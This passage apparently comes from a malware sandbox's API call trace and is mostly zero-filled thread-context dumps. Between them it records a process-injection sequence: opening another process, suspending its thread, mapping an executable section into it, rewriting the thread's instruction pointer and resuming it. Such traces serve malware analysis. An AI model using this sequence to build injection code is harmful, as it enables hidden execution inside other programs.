FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x40fa60, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x40fa08, Eip=0xdbc707, SegCs=0x23, EFlags=0x246, Esp=0x40f9ec, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0195.292] NtResumeThread (in: ThreadHandle=0xbc, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0195.292] NtClose (Handle=0x104) returned 0x0 [0195.292] NtClose (Handle=0xbc) returned 0x0 [0195.294] NtOpenProcess (in: ProcessHandle=0x19ea74, DesiredAccess=0x438, ObjectAttributes=0x19ea3c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea54*(UniqueProcess=0x89c, UniqueThread=0x0) | out: ProcessHandle=0x19ea74*=0xbc) returned 0x0 [0195.294] NtQueryInformationProcess (in: ProcessHandle=0xbc, ProcessInformationClass=0x1a, ProcessInformation=0x19ea64, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ea64, ReturnLength=0x0) returned 0x0 [0195.294] NtQueryInformationProcess (in: ProcessHandle=0xbc, ProcessInformationClass=0x0, ProcessInformation=0x19e6e8, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19e6e8, ReturnLength=0x0) returned 0x0 [0195.294] NtReadVirtualMemory (in: ProcessHandle=0xbc, BaseAddress=0x7efde000, Buffer=0x19e9fc, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0x19e9fc*, NumberOfBytesRead=0x0) returned 0x0 [0195.294] NtDelayExecution (Alertable=0, Interval=0x19e6d0*=-50000000) returned 0x0 [0195.305] NtOpenThread (in: ThreadHandle=0x19ea68, DesiredAccess=0x1a, ObjectAttributes=0x19e6b4, ClientId=0x19e6cc*(UniqueProcess=0x0, UniqueThread=0x8a0) | out: ThreadHandle=0x19ea68*=0x104) returned 0x0 [0195.305] NtSuspendThread (in: ThreadHandle=0x104, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0195.306] NtMapViewOfSection (in: SectionHandle=0xec, ProcessHandle=0xbc, BaseAddress=0x19e708*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19e708*=0x2500000, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000) returned 0x0 [0195.313] NtGetContextThread (in: ThreadHandle=0x104, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x36faf8, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x36faa0, Eip=0x766e78d7, SegCs=0x23, EFlags=0x246, Esp=0x36fa84, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0195.313] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x10c) returned 0x0 [0195.313] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0xffffffff, BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0x143200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f8*=0x32a0000, SectionOffset=0x0, ViewSize=0x19e6b0*=0x144000) returned 0x0 [0195.322] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0xbc, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0x143200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0xa80000, SectionOffset=0x0, ViewSize=0x19e6ec*=0x144000) returned 0x0 [0195.370] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x32a0000) returned 0x0 [0195.379] NtClose (Handle=0x10c) returned 0x0 [0195.380] NtSetContextThread (ThreadHandle=0x104, Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x36faf8, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x36faa0, Eip=0xb30707, SegCs=0x23, EFlags=0x246, Esp=0x36fa84, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, 